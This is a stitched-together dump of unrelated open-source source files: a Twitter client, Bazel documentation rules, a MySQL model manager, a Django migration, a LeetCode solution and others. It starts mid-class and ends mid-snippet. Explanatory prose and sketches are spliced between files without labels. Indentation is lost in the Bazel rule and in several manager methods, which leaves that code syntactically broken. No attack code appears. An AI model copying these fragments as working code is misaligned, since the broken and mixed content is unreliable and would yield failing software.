        return Status.get_status(id, http=self)

    def user(self, id, **kwargs):
        return User.get_user(http=self, id=id, **kwargs)

    def mentions(self, **kwargs):
        return Timeline.mentions(http=self, **kwargs)

    def friends(self, **kwargs):
        return UserList.get_friends(http=self, **kwargs)

    def direct_messages_received(self, **kwargs):
        return DirectMessageList.get_messages(http=self, **kwargs)

    def direct_messages_sent(self, **kwargs):
        return DirectMessageList.get_sent_messages(http=self, **kwargs)
def show_public(twitter):
    print "## Public timeline ##"
    for tweet in twitter.public_timeline():
        print unicode(tweet)


def show_dms(twitter):
    print "## Direct messages sent to me ##"
    for dm in twitter.direct_messages_received():
        print unicode(dm)


def show_friends(twitter):
    print "## Tweets from my friends ##"
    for tweet in twitter.friends_timeline():
        print unicode(tweet)
def main(argv=None):
    if argv is None:
        argv = sys.argv

    parser = OptionParser()
    parser.add_option("-u", "--username", dest="username",
        help="name of user for authentication")
    parser.add_option("--public", action="store_const", const=show_public,
        dest="action", default=show_public,
        help="Show tweets from the public timeline")
    parser.add_option("--dms", action="store_const", const=show_dms,
        dest="action", help="Show DMs sent to you (requires -u)")
    parser.add_option("--friends", action="store_const", const=show_friends,
        dest="action", help="Show your friends' recent tweets (requires -u)")
    opts, args = parser.parse_args()

    twitter = Twitter()

    # We'll use regular HTTP authentication, so ask for a password and add
    # it in the regular httplib2 way.
    if opts.username is not None:
        password = raw_input("Password (will echo): ")
        twitter.add_credentials(opts.username, password)

    try:
        print
        opts.action(twitter)
        print
    except httplib.HTTPException, exc:
        # The API could be down, or the credentials on an auth-only request
        # could be wrong, so show the error to the end user.
        print >>sys.stderr, "Error making request: %s: %s" \
            % (type(exc).__name__, str(exc))
        return 1

    return 0


if __name__ == '__main__':
    sys.exit(main())

# --- droxi/drox/write.py (andydude/droxtools, MIT) ---

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
import sys
import importlib
from .etree import etree
from .config import DEBUG
def drox_write(exp, fp=sys.stdout):
    fp.write(drox_write_string(exp) + '\n')


def drox_write_tree(exp):
    if DEBUG: print("write <= " + repr(exp))
    if hasattr(exp, '__tree__'):
        tree = exp.__tree__()
    else:
        name = '.'.join(type(exp).__module__.split('.')[:2])
        modulename = name + '.writer'
        #print("modulename = " + modulename)
        lib = importlib.import_module(modulename)
        tree = lib.Writer()(exp)
    if DEBUG: print("write => " + repr(tree))
    return tree


def drox_write_string(exp):
    tree = drox_write_tree(exp)
    return etree.tostring(tree)
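The dynamic writer lookup keys off the first two components of the expression's module path; a small standalone sketch of that derivation (the module name is faked so nothing is actually imported):

```python
class Node(object):
    pass

# Pretend the node class lives inside the package, as it would in real use.
Node.__module__ = 'droxi.drox.nodes'

exp = Node()
name = '.'.join(type(exp).__module__.split('.')[:2])
modulename = name + '.writer'
print(modulename)  # droxi.drox.writer
```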

# --- docs.bzl (es-ude/EmbeddedSystemsBuildScripts, MIT) ---

def _doxygen_archive_impl(ctx):
"""Generate a .tar.gz archive containing documentation using Doxygen.
Args:
name: label for the generated rule. The archive will be "%{name}.tar.gz".
doxyfile: configuration file for Doxygen, @@OUTPUT_DIRECTORY@@ will be replaced with the actual output dir
srcs: source files the documentation will be generated from.
"""
doxyfile = ctx.file.doxyfile
out_file = ctx.outputs.out
out_dir_path = out_file.short_path[:-len(".tar.gz")]
commands = [
"mkdir -p %s" % out_dir_path,
"out_dir_path=$(cd %s; pwd)" % out_dir_path,
"pushd %s" % doxyfile.dirname,
"""sed -e \"s:@@OUTPUT_DIRECTORY@@:$out_dir_path/:\" <%s | doxygen -""" % doxyfile.basename,
"popd",
"tar czf %s -C %s ./" % (out_file.path, out_dir_path),
]
ctx.actions.run_shell(
inputs = ctx.files.srcs + [doxyfile],
outputs = [out_file],
use_default_shell_env = True,
command = " && ".join(commands),
)
doxygen_archive = rule(
    implementation = _doxygen_archive_impl,
    attrs = {
        "doxyfile": attr.label(
            mandatory = True,
            allow_single_file = True,
        ),
        "srcs": attr.label_list(
            mandatory = True,
            allow_files = True,
        ),
    },
    outputs = {
        "out": "%{name}.tar.gz",
    },
)
def _sphinx_archive_impl(ctx):
    """
    Generates a sphinx documentation archive (.tar.gz).

    The output is called <name>.tar.gz, where <name> is the
    name of the rule.

    Args:
        config_file: sphinx conf.py file
        doxygen_xml_archive: an archive containing the generated doxygen
            xml files to be consumed by the breathe sphinx plugin.
            Setting this attribute automatically enables the breathe plugin
        srcs: the *.rst files to consume
    """
    out_file = ctx.outputs.sphinx
    out_dir_path = out_file.short_path[:-len(".tar.gz")]
    commands = ["mkdir _static"]
    inputs = ctx.files.srcs
    if ctx.attr.doxygen_xml_archive != None:
        commands = commands + [
            "mkdir xml",
            "tar -xzf {xml} -C xml --strip-components=2".format(xml = ctx.file.doxygen_xml_archive.path),
        ]
        inputs.append(ctx.file.doxygen_xml_archive)
    commands = commands + [
        "sphinx-build -M build ./ _build -q -b html -C {settings}".format(
            settings = _sphinx_settings(ctx),
            out_dir = out_dir_path,
        ),
    ]
    commands = commands + [
        "tar czf %s -C _build/build/ ./" % (out_file.path),
    ]
    ctx.actions.run_shell(
        use_default_shell_env = True,
        outputs = [out_file],
        inputs = inputs,
        command = " && ".join(commands),
    )
sphinx_archive = rule(
    implementation = _sphinx_archive_impl,
    attrs = {
        "srcs": attr.label_list(
            mandatory = True,
            allow_files = True,
        ),
        "doxygen_xml_archive": attr.label(
            default = None,
            allow_single_file = True,
        ),
        "master_doc": attr.string(default = "contents"),
        "version": attr.string(
            mandatory = True,
        ),
        "project": attr.string(
            default = "",
        ),
        "copyright": attr.string(default = ""),
        "extensions": attr.string_list(default = [
            "sphinx.ext.intersphinx",
            "sphinx.ext.todo",
        ]),
        "templates": attr.string_list(default = []),
        "source_suffix": attr.string_list(default = [".rst"]),
        "exclude_patterns": attr.string_list(default = ["_build", "Thumbs.db", ".DS_Store"]),
        "pygments_style": attr.string(default = ""),
        "language": attr.string(default = ""),
        "html_theme": attr.string(default = "sphinx_rtd_theme"),
        "html_theme_options": attr.string_dict(default = {}),
        "html_static_path": attr.string_list(default = ["_static"]),
        "html_sidebars": attr.string_dict(default = {}),
        "intersphinx_mapping": attr.string_dict(default = {}),
    },
    outputs = {
        "sphinx": "%{name}.tar.gz",
    },
)
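A hypothetical BUILD file wiring the two rules together (all labels and globs are placeholders, and feeding the doxygen archive into `doxygen_xml_archive` assumes the Doxyfile is configured to emit the XML that breathe consumes):

```starlark
load("//:docs.bzl", "doxygen_archive", "sphinx_archive")

doxygen_archive(
    name = "api_docs",
    doxyfile = "Doxyfile",
    srcs = glob(["src/**/*.h", "src/**/*.c"]),
)

sphinx_archive(
    name = "manual",
    srcs = glob(["docs/**/*.rst"]),
    version = "1.0",
    doxygen_xml_archive = ":api_docs",
)
```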
def add_option(settings, setting, value):
    # Only emit the flag for a non-empty value; the original guard
    # (value != None or len(value) == 0) would crash on None values.
    if value != None and len(value) != 0:
        settings = settings + ["-D {setting}={value}".format(setting = setting, value = value.replace(" ", "\\ "))]
    return settings
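A Python transliteration of the helper, with the guard written as intended (append the `-D` flag only when a non-empty value is supplied), handy for checking the space escaping:

```python
def add_option(settings, setting, value):
    # Mirror of the Starlark helper above; spaces are backslash-escaped so the
    # joined command line keeps "-D setting=value" as one shell word.
    if value is not None and len(value) != 0:
        settings = settings + ["-D {}={}".format(setting, value.replace(" ", "\\ "))]
    return settings

print(add_option([], "project", "my docs"))  # ['-D project=my\\ docs']
```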
def _sphinx_settings(ctx):
    settings = []
    extensions = ctx.attr.extensions
    settings = add_option(settings, "version", ctx.attr.version)
    if ctx.attr.project == "":
        settings = add_option(settings, "project", ctx.workspace_name)
    else:
        settings = add_option(settings, "project", ctx.attr.project)
    if ctx.attr.doxygen_xml_archive != None:
        extensions = extensions + ["breathe"]
        settings = add_option(settings, "breathe_projects." + ctx.workspace_name, "xml")
        settings = add_option(settings, "breathe_default_project", ctx.workspace_name)
    settings = add_option(settings, "copyright", ctx.attr.copyright)
    settings = add_option(settings, "master_doc", ctx.attr.master_doc)
    for extension in extensions:
        settings = add_option(settings, "extensions", extension)
    for template in ctx.attr.templates:
        settings = add_option(settings, "templates", template)
    for suffix in ctx.attr.source_suffix:
        settings = add_option(settings, "source_suffix", suffix)
    for pattern in ctx.attr.exclude_patterns:
        settings = add_option(settings, "exclude_patterns", pattern)
    settings = add_option(settings, "html_theme", ctx.attr.html_theme)
    for path in ctx.attr.html_static_path:
        settings = add_option(settings, "html_static_path", path)
    setting_string = " ".join(settings)
    return setting_string

# --- szndaogen/data_access/manager_base.py (seznam/szndaogen, MIT) ---

import typing

from ..tools.log import Logger
from .db import DBI
from .model_base import ModelBase
from ..config import Config


class ManagerException(BaseException):
    pass
class ViewManagerBase:
    MODEL_CLASS = ModelBase

    def __init__(self, dbi: DBI = None):
        """
        Init function of the base model manager class

        :param dbi: Instance of database connector. If empty it will be created automatically. An explicit DBI instance is usually used in combination with the transaction wrapper @DBI.transaction("dbi")
        """
        self.dbi = DBI() if dbi is None else dbi
        self.bulk_insert_buffer_size = 50
        self.bulk_insert_sql_statement = ""
        self.bulk_insert_values_buffer = []

    @classmethod
    def create_model_instance(cls, init_data: dict = None) -> ModelBase:
        if init_data is None:
            init_data = {}
        return cls.MODEL_CLASS(init_data)
    def select_one(
        self,
        *args,
        condition: str = "1",
        condition_params: typing.Tuple = (),
        projection: typing.Tuple = (),
        order_by: typing.Tuple = (),
    ) -> ModelBase:
        """
        Select one row from DB table or view

        :param projection: SQL projection - default *
        :param args: Primary keys, or condition and condition_params if there are no primary keys
        :param condition: SQL condition (will be used if there are no positional args from primary keys)
        :param condition_params: Positional params for SQL condition
            (will be used if there are no positional args from primary keys)
        :param order_by: Params for SQL ORDER BY statement
        """
        base_condition = self.MODEL_CLASS.Meta.SQL_STATEMENT_WHERE_BASE
        if args:
            condition = self._prepare_primary_sql_condition()
            condition_params = args
        projection_statement = ", ".join(projection) if projection else "*"
        order_by_sql_format = ", ".join(order_by)
        limit = 1
        if base_condition == "1":
            where_statement = f"WHERE ({condition})" if condition else ""
        else:
            where_statement = f"WHERE {base_condition} AND ({condition})" if condition else f"WHERE {base_condition}"
        order_by_statement = f"ORDER BY {order_by_sql_format}" if order_by else ""
        limit_statement = f"LIMIT {limit}" if limit else ""
        sql = self.MODEL_CLASS.Meta.SQL_STATEMENT.format(
            PROJECTION=projection_statement,
            WHERE=where_statement,
            ORDER_BY=order_by_statement,
            LIMIT=limit_statement,
            OFFSET="",
        )
        Logger.log.info("ViewManagerBase.select_one.sql", manager=self.__class__.__name__)
        result = self.dbi.fetch_one(sql, condition_params)
        Logger.log.info("ViewManagerBase.select_one.result", result=result, manager=self.__class__.__name__)

        if Config.MANAGER_AUTO_MAP_MODEL_ATTRIBUTES:
            return self.MODEL_CLASS(result).map_model_attributes() if result else None
        return self.MODEL_CLASS(result) if result else None
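How the template placeholders come together, sketched with a hypothetical `SQL_STATEMENT` template (the real one lives in the generated model's `Meta`):

```python
# Hypothetical template in the shape the Meta.SQL_STATEMENT placeholders imply.
template = "SELECT {PROJECTION} FROM `users` {WHERE} {ORDER_BY} {LIMIT} {OFFSET}"

sql = template.format(
    PROJECTION="*",
    WHERE="WHERE (id = %s)",
    ORDER_BY="",
    LIMIT="LIMIT 1",
    OFFSET="",
)
# Collapse the gaps left by empty placeholders for display.
print(" ".join(sql.split()))  # SELECT * FROM `users` WHERE (id = %s) LIMIT 1
```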
    def select_all(
        self,
        condition: str = "1",
        condition_params: typing.Tuple = (),
        projection: typing.Tuple = (),
        order_by: typing.Tuple = (),
        limit: int = 0,
        offset: int = 0,
    ) -> typing.List[ModelBase]:
        """
        Select all rows matching the condition

        :param offset: SQL offset
        :param projection: SQL projection - default *
        :param condition: SQL condition
        :param condition_params: Positional params for SQL condition
        :param order_by: Params for SQL ORDER BY statement
        :param limit: Params for SQL LIMIT statement
        """
        base_condition = self.MODEL_CLASS.Meta.SQL_STATEMENT_WHERE_BASE
        projection_statement = ", ".join(projection) if projection else "*"
        if base_condition == "1":
            where_statement = f"WHERE ({condition})" if condition else ""
        else:
            where_statement = f"WHERE {base_condition} AND ({condition})" if condition else f"WHERE {base_condition}"
        order_by_sql_format = ", ".join(order_by)
        if len(order_by) > 0:
            order_by_statement = f"ORDER BY {order_by_sql_format}"
        else:
            if self.MODEL_CLASS.Meta.SQL_STATEMENT_ORDER_BY_DEFAULT:
                order_by_statement = f"ORDER BY {self.MODEL_CLASS.Meta.SQL_STATEMENT_ORDER_BY_DEFAULT}"
            else:
                order_by_statement = ""
        limit_statement = f"LIMIT {limit}" if limit else ""
        offset_statement = f"OFFSET {offset}" if offset else ""
        sql = self.MODEL_CLASS.Meta.SQL_STATEMENT.format(
            PROJECTION=projection_statement,
            WHERE=where_statement,
            ORDER_BY=order_by_statement,
            LIMIT=limit_statement,
            OFFSET=offset_statement,
        )
        Logger.log.info("ViewManagerBase.select_all.sql", manager=self.__class__.__name__)
        results = self.dbi.fetch_all(sql, condition_params)
        Logger.log.info("ViewManagerBase.select_all.result", result=results, manager=self.__class__.__name__)

        if Config.MANAGER_AUTO_MAP_MODEL_ATTRIBUTES:
            Logger.log.debug("ViewManagerBase.select_all.result.list.automapped")
            return [self.MODEL_CLASS(result).map_model_attributes() for result in results]
        Logger.log.debug("ViewManagerBase.select_all.result.list")
        return [self.MODEL_CLASS(result) for result in results]
    @staticmethod
    def models_into_dicts(result: typing.List[ModelBase]) -> typing.List[typing.Dict]:
        """
        Convert result of select_all into a list of dicts

        :param result: List of models
        """
        return [item.to_dict() for item in result]

    @classmethod
    def _prepare_primary_sql_condition(cls):
        args = ["{} = %s".format(primary_key) for primary_key in cls.MODEL_CLASS.Meta.PRIMARY_KEYS]
        return " AND ".join(args)
    @classmethod
    def _prepare_primary_sql_condition_params(cls, model_instance: ModelBase):
        return [model_instance.__getattribute__(attribute_name) for attribute_name in cls.MODEL_CLASS.Meta.PRIMARY_KEYS]
class TableManagerBase(ViewManagerBase):
    def update_one(self, model_instance: ModelBase, exclude_none_values: bool = False, exclude_columns: list = None) -> int:
        """
        Update one database record based on model attributes

        :param model_instance: Model instance
        :param exclude_none_values: You can exclude columns with None value from the update statement
        :param exclude_columns: You can exclude column names from the update statement
        :return: Number of affected rows
        """
        exclude_columns = exclude_columns or []
        if not self.MODEL_CLASS.Meta.PRIMARY_KEYS:
            raise ManagerException("Can't update record based on model instance. There are no primary keys specified.")

        set_prepare = []
        set_prepare_params = []
        for attribute_name in self.MODEL_CLASS.Meta.ATTRIBUTE_LIST:
            value = model_instance.__getattribute__(attribute_name)
            if (exclude_none_values and value is None) or attribute_name in exclude_columns:
                continue
            set_prepare.append("`{}` = %s".format(attribute_name))
            set_prepare_params.append(value)
        condition_prepare = self._prepare_primary_sql_condition()
        condition_prepare_params = self._prepare_primary_sql_condition_params(model_instance)
        sql = "UPDATE `{}` SET {} WHERE {} LIMIT 1".format(
            self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(set_prepare), condition_prepare
        )
        Logger.log.info("TableManagerBase.update_one.sql", manager=self.__class__.__name__)
        result = self.dbi.execute(sql, set_prepare_params + condition_prepare_params)
        Logger.log.info("TableManagerBase.update_one.result", result=result, manager=self.__class__.__name__)
        return result
    def insert_one(
        self,
        model_instance: ModelBase,
        exclude_none_values: bool = False,
        exclude_columns: list = None,
        use_on_duplicate_update_statement: bool = False,
        use_insert_ignore_statement: bool = False,
    ) -> int:
        """
        Insert one record into the database based on model attributes

        :param model_instance: Model instance
        :param exclude_none_values: You can exclude columns with None value from the insert statement
        :param exclude_columns: You can exclude column names from the insert statement
        :param use_on_duplicate_update_statement: Use ON DUPLICATE KEY UPDATE statement
        :param use_insert_ignore_statement: Use INSERT IGNORE statement
        :return: Last inserted id if it is possible
        """
        exclude_columns = exclude_columns or []
        insert_prepare = []
        insert_prepare_values = []
        insert_prepare_params = []
        update_prepare = []
        for attribute_name in self.MODEL_CLASS.Meta.ATTRIBUTE_LIST:
            value = model_instance.__getattribute__(attribute_name)
            if (exclude_none_values and value is None) or attribute_name in exclude_columns:
                continue
            insert_prepare.append("`{}`".format(attribute_name))
            insert_prepare_values.append("%s")
            insert_prepare_params.append(value)
            if use_on_duplicate_update_statement:
                update_prepare.append("`{0}` = VALUES(`{0}`)".format(attribute_name))

        if use_on_duplicate_update_statement:
            sql = "INSERT INTO `{}` ({}) VALUES ({}) ON DUPLICATE KEY UPDATE {}".format(
                self.MODEL_CLASS.Meta.TABLE_NAME,
                ", ".join(insert_prepare),
                ", ".join(insert_prepare_values),
                ", ".join(update_prepare),
            )
        elif use_insert_ignore_statement:
            sql = "INSERT IGNORE INTO `{}` ({}) VALUES ({})".format(
                self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
            )
        else:
            sql = "INSERT INTO `{}` ({}) VALUES ({})".format(
                self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
            )
        Logger.log.info("TableManagerBase.insert_one.sql", manager=self.__class__.__name__)
        result = self.dbi.execute(sql, insert_prepare_params)

        # set primary key value on the model if the table has a single integer primary key
        if (
            result
            and len(self.MODEL_CLASS.Meta.PRIMARY_KEYS) == 1
            and self.MODEL_CLASS.Meta.ATTRIBUTE_TYPES[self.MODEL_CLASS.Meta.PRIMARY_KEYS[0]] == int
        ):
            model_instance.__setattr__(self.MODEL_CLASS.Meta.PRIMARY_KEYS[0], result)
        Logger.log.info("TableManagerBase.insert_one.result", result=result, manager=self.__class__.__name__)
        return result
    def insert_one_bulk(
        self,
        model_instance: ModelBase,
        exclude_none_values: bool = False,
        exclude_columns: list = None,
        use_on_duplicate_update_statement: bool = False,
        use_insert_ignore_statement: bool = False,
        auto_flush: bool = True,
    ) -> int:
        """
        Insert more records in one bulk.

        :param model_instance: Model instance
        :param exclude_none_values: You can exclude columns with None value from the insert statement
        :param exclude_columns: You can exclude column names from the insert statement
        :param use_on_duplicate_update_statement: Use ON DUPLICATE KEY UPDATE statement
        :param use_insert_ignore_statement: Use INSERT IGNORE statement
        :param auto_flush: Auto flush bulks from buffer after N records (defined in self.bulk_insert_buffer_size)
        :return: Number of items in buffer
        """
        exclude_columns = exclude_columns or []
        insert_prepare = []
        insert_prepare_values = []
        insert_prepare_params = []
        update_prepare = []
        for attribute_name in self.MODEL_CLASS.Meta.ATTRIBUTE_LIST:
            value = model_instance.__getattribute__(attribute_name)
            if (exclude_none_values and value is None) or attribute_name in exclude_columns:
                continue
            insert_prepare.append("`{}`".format(attribute_name))
            insert_prepare_values.append("%s")
            insert_prepare_params.append(value)
            if use_on_duplicate_update_statement:
                update_prepare.append("`{0}` = VALUES(`{0}`)".format(attribute_name))

        if not self.bulk_insert_sql_statement:
            if use_on_duplicate_update_statement:
                self.bulk_insert_sql_statement = "INSERT INTO `{}` ({}) VALUES ({}) ON DUPLICATE KEY UPDATE {}".format(
                    self.MODEL_CLASS.Meta.TABLE_NAME,
                    ", ".join(insert_prepare),
                    ", ".join(insert_prepare_values),
                    ", ".join(update_prepare),
                )
            elif use_insert_ignore_statement:
                self.bulk_insert_sql_statement = "INSERT IGNORE INTO `{}` ({}) VALUES ({})".format(
                    self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
                )
            else:
                self.bulk_insert_sql_statement = "INSERT INTO `{}` ({}) VALUES ({})".format(
                    self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
                )
        self.bulk_insert_values_buffer.append(insert_prepare_params)
        buffer_len = len(self.bulk_insert_values_buffer)
        if auto_flush and buffer_len >= self.bulk_insert_buffer_size:
            self.insert_bulk_flush()
        return buffer_len
def insert_bulk_flush(self) -> int:
"""
Flush prepared inserts from buffer
:return: Number of inserted rows
"""
result = None
if self.bulk_insert_values_buffer:
result = self.dbi.execute_many(self.bulk_insert_sql_statement, self.bulk_insert_values_buffer)
Logger.log.info(
"TableManagerBase.insert_one_bulk_flush.result",
result=result,
inserted_count=len(self.bulk_insert_values_buffer),
manager=self.__class__.__name__,
)
self.bulk_insert_sql_statement = ""
self.bulk_insert_values_buffer = []
return result
def delete_one(self, model_instance: ModelBase) -> int:
"""
Delete one row matching primary key condition.
:param model_instance: Instance of model
:return: Number of affected rows
"""
condition_prepare = self._prepare_primary_sql_condition()
condition_prepare_params = self._prepare_primary_sql_condition_params(model_instance)
sql_statement = "DELETE FROM `{}` WHERE {} LIMIT 1"
sql = sql_statement.format(self.MODEL_CLASS.Meta.TABLE_NAME, condition_prepare)
Logger.log.info("TableManagerBase.delete_one.sql", manager=self.__class__.__name__)
result = self.dbi.execute(sql, condition_prepare_params)
Logger.log.info(f"TableManagerBase.delete_one.result", result=result, manager=self.__class__.__name__)
return result
def delete_all(
self, condition: str, condition_params: typing.Tuple = (), order_by: typing.Tuple = (), limit: int = 0
) -> int:
"""
Delete all table rows matching condition.
:param condition: SQL condition statement
:param condition_params: SQL condition position params
:param order_by: SQL order statement
:param limit: SQL limit statement
:return: Number of affected rows
"""
where_statement = f"WHERE {condition}"
order_by_sql_format = ", ".join(order_by)
order_by_statement = f"ORDER BY {order_by_sql_format}" if order_by else ""
limit_statement = f"LIMIT {limit}" if limit else ""
sql_statement = "DELETE FROM `{TABLE}` {WHERE} {ORDER_BY} {LIMIT}"
sql = sql_statement.format(
TABLE=self.MODEL_CLASS.Meta.TABLE_NAME,
WHERE=where_statement,
ORDER_BY=order_by_statement,
LIMIT=limit_statement,
)
Logger.log.info("TableManagerBase.delete_all.sql", manager=self.__class__.__name__)
result = self.dbi.execute(sql, condition_params)
Logger.log.info("TableManagerBase.delete_all.result", result=result, manager=self.__class__.__name__)
return result
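The insert statements above are built by joining the column names into the column list and emitting one "%s" placeholder per column, so values travel separately as driver parameters. A standalone, stdlib-only sketch of that pattern (the table and column names here are made up, not from the manager above):

```python
# Sketch of the parameterized INSERT construction used by the table manager:
# backtick-quoted column names, one "%s" placeholder per column.
columns = ["id", "name", "email"]
placeholders = ["%s"] * len(columns)
sql = "INSERT INTO `{}` ({}) VALUES ({})".format(
    "users",
    ", ".join("`{}`".format(c) for c in columns),
    ", ".join(placeholders),
)
print(sql)
# -> INSERT INTO `users` (`id`, `name`, `email`) VALUES (%s, %s, %s)
```

Keeping values out of the SQL string and passing them as parameters is what lets the bulk path reuse one statement for many rows via `execute_many`.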

# --- src/users/actions.py (josue0ghost/Python-and-MySQL-console-application, MIT) ---

import users.user as user
import grades.actions as grade


class Actions:

    def signup(self):
        print("Selected item: signup")
        name = input("Your name: ")
        lastname = input("Your last name: ")
        email = input("Your email: ")
        password = input("Choose a password: ")

        newUser = user.User(name, lastname, email, password)
        reg = newUser.register()

        if reg[0] >= 1:
            print(f"{reg[1].name}, you've been registered with email {reg[1].email}")
        else:
            print("Registration failed")

    def signin(self):
        try:
            email = input("Email: ")
            password = input("Password: ")

            existingUser = user.User('', '', email, password)
            login = existingUser.identify()

            # id | name | lastname | email | password | date
            if email == login[3]:
                print(f"Welcome, {login[1]}")
                self.mainMenu(login)
        except Exception as e:
            print(type(e))
            print(type(e).__name__)
            print("Login failed")

    def mainMenu(self, user):
        print("""
        Available options:
        - Create grade (create)
        - Show grades (show)
        - Delete grade (delete)
        - Log out (exit)
        """)

        action = input("What do you want to do?: ")
        gradeActions = grade.Actions()

        if action == "create":
            gradeActions.create(user)
            self.mainMenu(user)
        elif action == "show":
            gradeActions.show(user)
            self.mainMenu(user)
        elif action == "delete":
            gradeActions.delete(user)
            self.mainMenu(user)
        elif action == "exit":
            exit()

# --- topics/migrations/0001_initial.py (codingforentrepreneurs/Autogenerate-Django-Models-, MIT) ---

# Generated by Django 3.1.3 on 2020-11-08 19:52
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Topics',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tag', models.CharField(blank=True, max_length=120, null=True)),
                ('count', models.BigIntegerField(blank=True, null=True)),
                ('percent', models.DecimalField(blank=True, decimal_places=5, max_digits=10, null=True)),
            ],
        ),
    ]

# --- 783-minimum-distance-between-bst-nodes.py (hyeseonko/LeetCode, MIT) ---

# Definition for a binary tree node.
# class TreeNode:
#     def __init__(self, val=0, left=None, right=None):
#         self.val = val
#         self.left = left
#         self.right = right
class Solution:
    def minDiffInBST(self, root: Optional[TreeNode]) -> int:
        # BFS over the tree, collecting every node value
        output = []
        stack = [root]
        while stack:
            cur = stack.pop(0)
            output.append(cur.val)
            if cur.left:
                stack.append(cur.left)
            if cur.right:
                stack.append(cur.right)
        # after sorting, the minimum difference is between adjacent values
        sorted_output = sorted(output)
        diff = sorted_output[1] - sorted_output[0]
        for i in range(2, len(sorted_output)):
            if sorted_output[i] - sorted_output[i - 1] < diff:
                diff = sorted_output[i] - sorted_output[i - 1]
        return diff
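The solution above works because once all node values are sorted, the minimum difference between any two nodes must occur between adjacent sorted values. A minimal stdlib-only sketch of that reduction on plain lists (the helper name `min_adjacent_gap` is hypothetical, not part of the solution):

```python
def min_adjacent_gap(values):
    """Return the smallest difference between any two values in the list."""
    ordered = sorted(values)
    # only adjacent pairs in sorted order can realize the minimum gap
    return min(b - a for a, b in zip(ordered, ordered[1:]))


# values in the order a BFS over a BST might collect them
print(min_adjacent_gap([4, 2, 6, 1, 3]))  # -> 1
```

For a BST specifically, an in-order traversal would yield the values already sorted, which is why the sort step is merely a convenience here.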

# --- pexp/management/commands/p2cmd.py (bconstantin/django_polymorphic, BSD-3-Clause) ---

# -*- coding: utf-8 -*-
"""
This module is a scratchpad for general development, testing & debugging.
Well, even more so than pcmd.py. You best ignore p2cmd.py.
"""

import uuid
from django.core.management.base import NoArgsCommand
from django.db.models import connection
from pprint import pprint
import settings
import time, sys

from pexp.models import *


def reset_queries():
    connection.queries = []


def show_queries():
    print; print 'QUERIES:', len(connection.queries); pprint(connection.queries); print; connection.queries = []


def print_timing(func, message='', iterations=1):
    def wrapper(*arg):
        results = []
        reset_queries()
        for i in xrange(iterations):
            t1 = time.time()
            x = func(*arg)
            t2 = time.time()
            results.append((t2 - t1) * 1000.0)
        res_sum = 0
        for r in results:
            res_sum += r
        median = res_sum / len(results)
        print '%s%-19s: %.4f ms, %i queries (%i times)' % (
            message, func.func_name,
            res_sum,
            len(connection.queries),
            iterations
        )
        sys.stdout.flush()
    return wrapper


class Command(NoArgsCommand):
    help = ""

    def handle_noargs(self, **options):
        print 'polycmd - sqlite test db is stored in:', settings.SQLITE_DB_PATH
        print

        if False:
            ModelA.objects.all().delete()
            a = ModelA.objects.create(field1='A1')
            b = ModelB.objects.create(field1='B1', field2='B2')
            c = ModelC.objects.create(field1='C1', field2='C2', field3='C3')
            reset_queries()
            print ModelC.base_objects.all();
            show_queries()

        if False:
            ModelA.objects.all().delete()
            for i in xrange(1000):
                a = ModelA.objects.create(field1=str(i % 100))
                b = ModelB.objects.create(field1=str(i % 100), field2=str(i % 200))
                c = ModelC.objects.create(field1=str(i % 100), field2=str(i % 200), field3=str(i % 300))
                if i % 100 == 0: print i

        f = print_timing(poly_sql_query, iterations=1000)
        f()
        f = print_timing(poly_sql_query2, iterations=1000)
        f()
        return

        nModelA.objects.all().delete()
        a = nModelA.objects.create(field1='A1')
        b = nModelB.objects.create(field1='B1', field2='B2')
        c = nModelC.objects.create(field1='C1', field2='C2', field3='C3')

        qs = ModelA.objects.raw("SELECT * from pexp_modela")
        for o in list(qs): print o


from django.db import connection, transaction
from random import Random
rnd = Random()


def poly_sql_query():
    cursor = connection.cursor()
    cursor.execute("""
        SELECT id, pexp_modela.field1, pexp_modelb.field2, pexp_modelc.field3
        FROM pexp_modela
        LEFT OUTER JOIN pexp_modelb
        ON pexp_modela.id = pexp_modelb.modela_ptr_id
        LEFT OUTER JOIN pexp_modelc
        ON pexp_modelb.modela_ptr_id = pexp_modelc.modelb_ptr_id
        WHERE pexp_modela.field1=%i
        ORDER BY pexp_modela.id
        """ % rnd.randint(0, 100))
    #row=cursor.fetchone()
    return


def poly_sql_query2():
    cursor = connection.cursor()
    cursor.execute("""
        SELECT id, pexp_modela.field1
        FROM pexp_modela
        WHERE pexp_modela.field1=%i
        ORDER BY pexp_modela.id
        """ % rnd.randint(0, 100))
    #row=cursor.fetchone()
    return

# --- src/aiographql/client/response.py (ehtec/aiographql-client, MIT) ---

from dataclasses import dataclass, field
from typing import Any, Dict, List

from aiographql.client.error import GraphQLError
from aiographql.client.request import GraphQLRequestContainer


@dataclass(frozen=True)
class GraphQLBaseResponse(GraphQLRequestContainer):
    json: Dict[str, Any] = field(default_factory=dict)


@dataclass(frozen=True)
class GraphQLResponse(GraphQLBaseResponse):
    """
    GraphQL Response object wrapping response data and any errors. This object also
    contains a copy of the :class:`GraphQLRequest` that produced this response.
    """

    @property
    def errors(self) -> List[GraphQLError]:
        """
        A list of :class:`GraphQLError` objects if the server responded with query errors.
        """
        return [GraphQLError.load(error) for error in self.json.get("errors", list())]

    @property
    def data(self) -> Dict[str, Any]:
        """The data payload the server responded with."""
        return self.json.get("data", dict())

    @property
    def query(self) -> str:
        """The query string used to produce this response."""
        return self.request.query
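The response class above follows a common pattern: a frozen dataclass holds the raw JSON payload, and properties lazily extract the `errors` and `data` keys on access. A standalone, stdlib-only sketch of the same pattern (the `MiniResponse` name and its error shape are made up for illustration, not aiographql's API):

```python
from dataclasses import dataclass, field
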